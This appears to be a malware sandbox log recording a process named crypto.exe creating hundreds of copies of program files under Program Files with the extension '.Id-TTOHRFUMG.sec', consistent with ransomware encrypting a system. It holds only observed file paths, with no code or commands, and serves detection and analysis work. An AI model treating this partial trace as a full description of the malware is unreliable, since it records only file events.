File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.jarprocessor_1.0.300.v20131211-1531.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Riga.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\BS00439_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\FORMS\1033\OOFL.ICO.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\bin\dcpr.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SO00333_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD15133_.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\PSRCHKEY.DAT.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Mozilla Firefox\IA2Marshal.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\plugins\video_output\libdirect3d11_plugin.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0382967.JPG.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\OCEAN_01.MID.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SL01565_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\WB01219_.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\zi\Asia\Pyongyang.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\BD19563_.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Document Themes 14\Theme Colors\Grayscale.xml.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Google\Update\1.3.35.452\psmachine_64.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Tehran.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\bin\msvcr100.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\zi\Asia\Damascus.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\ADDINS\OUTEX2.ECF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.apache.jasper.glassfish_2.2.2.v201205150955.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\zi\Europe\Uzhgorod.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\IN00177_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA02450_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PH03379I.JPG.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\PUBWIZ\DGSIDEBR.XML.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\lua\http\requests\vlm.xml.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\RSSFeeds.Gadget\images\item_hover_floating.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Pyongyang.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1254.TXT.Id-TTOHRFUMG.sec	crypto.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can03.ths	crypto.exe
File created	C:\Program Files\Java\jre7\lib\fonts\LucidaBrightItalic.ttf.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PH01931J.JPG.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SO00200_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Document Themes 14\Theme Effects\Apothecary.eftx.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\btn_close_down.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.bindings.nl_ja_4.4.0.v20140623020002.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0099194.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA02398_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\DVD Maker\Shared\DvdStyles\ResizingPanels\bandwidth.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SY01253_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\QuickStyles\Classic.dotx.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\CONVERT\1033\DELIMR.FAE.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\plugins\stream_out\libstream_out_delay_plugin.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\32.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0187817.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0099176.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PE00726_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\46.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-lib-uihandler_zh_CN.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\MSOUC_F_COL.HXK.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\OutlookAutoDiscover\YAHOO.CA.XML.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\OutlookAutoDiscover\YAHOO.COM.SG.XML.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Synchronization Services\ADO.NET\v1.0\Microsoft.Synchronization.Data.SqlServerCe.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\RSSFeeds.Gadget\en-US\css\RSSFeeds.css.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\DVD Maker\Shared\DvdStyles\OldAge\15x15dot.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\MEDIA\CAGCAT10\J0297707.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\Calendar\CalendarToolIconImages.jpg.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms5\rtf_increaseindent.gif.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\CPU.Gadget\en-US\js\cpu.js.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\create_form.gif.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\RSSFeeds.Gadget\images\rssBackBlue_docked.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0107482.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\BS00136_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\PUBSPAPR\ZPDIR31F.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\CommonData\AlertImage_MediumMAsk.bmp.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\VisualBasic\1033\Text.zip.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\update_tracking\com-sun-tools-visualvm-profiling.xml.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.core.di.extensions_0.12.0.v20140417-2033.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PH02749U.BMP.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\PUBSPAPR\ZPDIR24F.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\34.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\SystemV\HST10.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\bin\pack200.exe.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\zi\SystemV\YST9.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\Publisher\Backgrounds\J0143744.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\PUBSPAPR\PDIR39F.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\plugins\mux\libmux_ts_plugin.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Microsoft Office\Office14\ONBttnIELinkedNotes.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\rt.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Templates\1033\MedianLetter.Dotx.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\RSSFeeds.Gadget\images\rssBackBlue_docked.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\LogTransport2.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\Images\4.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\FORMS\1033\SCHDREST.CFG.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.metadata.nl_zh_4.4.0.v20140623020002.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\zi\America\Indiana\Petersburg.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD21481_.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\11.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviewers.gif.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Google\Update\1.3.35.452\goopdateres_ta.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\DVD Maker\Shared\DvdStyles\LayeredTitles\NavigationRight_SelectionSubpicture.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\jfr.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AN01251_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\plugins\stream_out\libstream_out_mosaic_bridge_plugin.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\org-netbeans-modules-profiler.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\HH00084_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0102984.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PE03795_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Google\Update\1.3.35.452\goopdateres_et.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\45.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\DVD Maker\Shared\DvdStyles\SpecialOccasion\specialoccasion.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\fontconfig.bfc.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\PUBWIZ\DGBORDER.XML.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\SlideShow.Gadget\en-US\css\slideShow.css.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\7.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\7-Zip\Lang\he.txt.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\bin\plugin2\msvcr100.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PH02748U.BMP.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Microsoft Analysis Services\AS OLEDB\10\Cartridges\as90.xsl.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-modules-print.xml.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\MEDIA\OFFICE14\AUTOSHAP\BD18213_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\MEDIA\OFFICE14\LINES\BD21305_.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\Casual.css.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\plugins\codec\libaes3_plugin.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Google\Update\1.3.35.452\goopdateres_ro.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-openide-options.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\locale\ta\LC_MESSAGES\vlc.mo.Id-TTOHRFUMG.sec	crypto.exe
File opened for modification	C:\Program Files (x86)\Google\Temp\GUM2396.tmp\GoogleUpdateSetup.exe	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\org-netbeans-modules-profiler-utilities.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\css\e4_default_mac.css.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\BD19582_.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PE03339_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\SpringGreen\TAB_OFF.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsStyles\Lime.css.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\docked_blue_snow.png.Id-TTOHRFUMG.sec	crypto.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\PFM\zy______.pfm	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.ssl.feature_1.0.0.v20140827-1444\feature.xml.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\PUBSPAPR\ZPDIR49B.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\Swirl\background.gif.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\PUBWIZ\DGREPFRM.XML.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\PUBWIZ\DGWEBCAL.DPV.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\SlideShow.Gadget\images\reveal_rest.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\conticon.gif.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\MSO.ACL.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\rtf_underline.gif.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\HH00241_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\icons\flight_recorder.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.views.nl_ja_4.4.0.v20140623020002.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0237759.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0238333.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PH02743G.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\PUBCONV.DLL.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\lua\http\images\Audio-48.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Kosrae.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\en-US\js\settings.js.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\plugins\video_output\libvdummy_plugin.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-modules-spi-actions.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\MAPIR.DLL.IDX_DLL.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\3082\MSO.ACL.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\CONVERT\1033\OLNOTER.FAE.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\Images\2.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.flightrecorder.ui.ja_5.5.0.165303.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\p2\org.eclipse.equinox.p2.core\cache\binary\com.oracle.jmc.executable.win32.win32.x86_64_5.5.0.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\zi\America\Indiana\Vincennes.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SO02025_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD14582_.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\excelcnv.exe.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\DVD Maker\Shared\DvdStyles\OldAge\decorative_rule.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.console_1.0.300.v20131113-1212.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SO00479_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\OUTLBAR.INF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Media Player\WMPDMC.exe.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.VisualBasic.Targets.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Australia\Sydney.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\bin\servertool.exe.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Antarctica\Davis.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0107342.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PE00049_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\Clock.Gadget\images\modern_m.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MyriadPro-Bold.otf.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\DVD Maker\Shared\DvdStyles\Travel\TravelIntroToMainMask_PAL.wmv.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\plugins\audio_filter\libcompressor_plugin.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\144DPI\(144DPI)grayStateIcon.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Google\Chrome\Application\83.0.4103.106\default_apps\docs.crx.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0217302.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\ext\meta-index.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\MSPUB.DEV_F_COL.HXK.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\en-US\settings.html.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\DVD Maker\Shared\DvdStyles\Full\dotsdarkoverlay.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-core-multiview.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\zi\America\Argentina\Jujuy.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\zi\America\Swift_Current.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveProjectToolset\ZoomIcons.jpg.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Templates\1033\Access\Part\1 Top.accdt.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\bin\jsdt.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\SpringGreen\BUTTON.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\PROOF\MSSP7ES.dub.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\flavormap.properties.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\com.jrockit.mc.feature.core_5.5.0.165303\feature.properties.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Microsoft.Office.InfoPath.FormControl.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\plugins\video_filter\libmotionblur_plugin.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Stockholm.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\FD02116_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\plugins\codec\libflac_plugin.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\Images\settings_left_disabled.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\zi\HST.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolBMPs\NotifierUpArrow.jpg.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\33.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-modules-spi-actions.xml.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\zi\America\Rio_Branco.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Media Player\Media Renderer\DMR_48.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\Clock.Gadget\images\square.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Norfolk.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\locale\uk\LC_MESSAGES\vlc.mo.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\deploy\messages_zh_TW.properties.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\zi\Asia\Srednekolymsk.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\OUTLOOK_COL.HXC.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\CPU.Gadget\drag.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Campo_Grande.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\FormsTemplates\Process Library.fdt.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Etc\GMT-5.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.w3c.dom.smil_1.0.0.v200806040011.jar.Id-TTOHRFUMG.sec	crypto.exe
